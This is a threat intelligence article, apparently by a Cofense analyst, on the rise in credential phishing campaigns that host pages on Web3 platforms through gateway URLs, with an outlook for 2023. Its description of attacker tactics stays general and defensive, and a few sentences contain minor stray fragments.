Web3 platforms have risen in popularity over the years and continue to grab headlines with multi-billion dollar investments as well as major downturns. According to McKinsey, despite early funding issues, Web3 application adoption has occurred at an exponential rate, leading many industry professionals to question how secure and stable these platforms are.

Web3 platforms are designed to make content hosting more available to people, bypass censorship, ensure access to published content, and avoid technical issues like server administration, which makes these platforms attractive to actors. of threats seeking to host malicious content.

By analyzing the credential phishing campaigns that hit inboxes during the first three quarters of 2022, Cofense discovered a significant increase in the abuse of Web3 platforms for phishing. As a result, phishing campaigns abusing Web3 platforms have increased by 482% in 2022, with credential phishing accounting for the majority of abuse.

How Web3 is exploited by threat actors

Web3 platforms require the creation of a network of many different servers working together to host content. Not all web browsers support direct access to these platforms. To make Web3 services more usable, some organizations run servers that produce “Gateway URLs,” which allow browsers to open Web3 content as if it were hosted on a traditional server.

Gateway services help in the adoption of Web3 technologies by making them more accessible. However, these services are used by threat actors to send links to phishing pages that they host on Web3 platforms. Services can choose to disable a gateway URL that points to malicious or illegal content, but the effort becomes a cat-and-mouse game, as threat actors can simply republish their content with new URLs. of gateway.

Why Web3 is an attractive target

Web3 platforms do not have organized moderators to manage hosted content. While some measures are in place to limit malicious content, it is impossible to prevent it from being hosted within the platforms or to remove it once it has been hosted. Web3 platforms are readily available to any user with relevant software and the content is hosted collaboratively by users of the platforms.

The most common tactics used by threat actors when exploiting Web3 platforms using malicious URLs can be divided into two stages. Stage 1 includes embedded URLs in the email. Only 21 percent of Web3 URLs are used in stage 1, as they are easier for organizations to identify and block. Stage 2 involves any URLs that open after users have opened the link embedded in the email.

Since content posted to Web3 platforms is considered permanent, this eliminates the need for threat actors to create or steal accounts, compromise websites, or register new domains to host a credential phishing page. Threat actors can continually publish new phishing pages to get ahead of countermeasures.

Although Web3 platforms are an attractive host for threat actors, these platforms cannot perform data exfiltration. Instead, threat actors must maintain more traditional compromised or malicious servers as endpoints to receive stolen credentials. They often use HTML forms or embedded JavaScript code so that the victim’s browser sends the captured login credentials to endpoints under the control of the threat actor.

Web3 Outlook 2023

Forrester stated in its trend report “Web3 promises a better online future but contains the seeds of a dystopian nightmare” that CIOs, CMOs and other executives should approach Web3 with extreme caution, even as investment in Web3 technologies continues to skyrocket.

As Web3 technology gains adoption in the daily lives of users and organizations, the opportunity for abuse will only grow. The decentralized nature of these platforms puts the responsibility for security in the hands of individuals, and as Web3 platforms increase in popularity, threat actors will continue to take advantage of this opportunity, so it is essential that users stay informed and vigilant to prevent exploitation via Web3. phishing threats.

Author of the photo: wk1003mike / Shutterstock

Brad Haas is a Threat Intelligence Analyst, Cofense.